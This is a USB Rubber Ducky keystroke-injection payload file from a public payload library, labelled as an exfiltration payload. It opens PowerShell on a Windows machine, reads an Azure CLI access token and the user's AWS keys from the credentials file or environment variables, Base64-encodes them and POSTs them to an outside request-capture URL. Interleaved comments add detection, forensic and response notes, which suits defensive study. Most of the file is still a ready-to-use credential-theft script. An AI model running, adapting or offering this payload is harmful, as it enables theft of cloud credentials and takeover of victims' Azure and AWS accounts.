hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateCloudCreds/payload.txt
REM Title: Exfil Cloud Credentials
REM Author: github.com/jasonotu
REM Description: Exfils Azure access token and AWS keys using respective CLI
REM Target: Windows
REM Version: 1.0
REM Category: Exfiltration
REM
REM Summary: keystroke injection that opens PowerShell from the Run dialog, reads an
REM Azure CLI access token and the logged-in user's AWS keys, Base64-encodes both and
REM POSTs them to the URL defined below.
REM Preconditions visible in the script: an unlocked Windows session, an az CLI that
REM resolves by bare name and is already signed in, and AWS keys either in
REM <user profile>\.aws\credentials or in the AWS_* environment variables.
REM Nothing below elevates privileges or hides the window; every command runs as the
REM logged-in user in a visible console.
REM Delivery-path controls: device-control policy for new USB HID keyboards and locking
REM unattended sessions.
REM Pause inserted between every command that follows.
DEFAULTDELAY 10

REM Collection URL substituted into the request line near the end. The host is a placeholder.
REM Detection: proxy or DNS logs showing powershell.exe posting to a request-capture host.
DEFINE #ENDPOINT https://xxxxxxxxxxxxxxxx.m.pipedream.net

REM DELAY values are milliseconds.
DELAY 1000
REM Open Run dialog
REM Forensics: commands entered in the Run dialog are recorded under the user's
REM Explorer RunMRU registry key.
GUI r
DELAY 500
REM Type "powershell" to open PowerShell
REM Forensics: lines typed into an interactive console are saved by PSReadLine to the
REM user's ConsoleHost_history.txt unless history saving is disabled, and appear in
REM script block logging (event 4104) where that is enabled.
STRING powershell
ENTER
DELAY 1000

REM Get access token from authenticated Azure CLI
REM $userProfile is resolved here and used further down to build the AWS file path.
STRING $userProfile = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::UserProfile)
ENTER
REM Detection: az invoked from an interactive powershell.exe that was started via the Run dialog.
STRING $token = az account get-access-token
ENTER
REM The outer parentheses make PowerShell print the assigned value, so the encoded token
REM is shown in the console window.
STRING ($az_encoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($token)))
ENTER
REM Presumably gives the az call time to return before typing continues.
DELAY 3000

REM Get AWS keys
REM Reads the shared credentials file when it exists; otherwise falls back to the two
REM AWS_* environment variables. The if/else statement is typed across two lines.
REM Hardening: short-lived credentials instead of static keys in this file leave less to read.
STRING $creds = $userProfile + "\.aws\credentials"
ENTER
REM Prints the resolved path to the console.
STRING echo $creds
ENTER
STRING $keys = if (Test-Path -Path $creds -PathType Leaf) {Get-Content -Path $creds} else
ENTER
STRING {echo "AWS_ACCESS_KEY_ID = ${env:AWS_ACCESS_KEY_ID} AWS_SECRET_ACCESS_KEY = ${env:AWS_SECRET_ACCESS_KEY}"}
ENTER
REM Base64 is an encoding only; the values stay recoverable by anyone who can read the
REM request body, for example a TLS-inspecting proxy.
STRING $aws_encoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($keys))
ENTER

REM Got the loot, exfil
REM NOTE(review): $endpoint is assigned an empty string and is not referenced by any
REM later line shown here; the request line uses the #ENDPOINT define instead.
STRING $endpoint = ''
ENTER
REM Request body with the keys az and aws, assembled by string concatenation.
STRING $loot = '{""az"":""' + $az_encoded + '"",""aws"":""' + $aws_encoded + '""}'
ENTER
DELAY 500
REM Send the HTTP request
REM Detection: outbound HTTPS POST with Content-Type application/json issued by powershell.exe.
REM Response: when this sequence is observed, treat the AWS keys and the Azure sign-in as
REM exposed; rotate the keys and revoke the account's sessions.
STRING $response = Invoke-RestMethod -Uri #ENDPOINT -Method Post -ContentType 'application/json' -Body $loot
ENTER
DELAY 1000
REM Display the response
STRING $response
ENTER
DELAY 1000
REM Exit PowerShell
REM Closes the console; the script does not clear the history or the RunMRU entry.
STRING exit
ENTER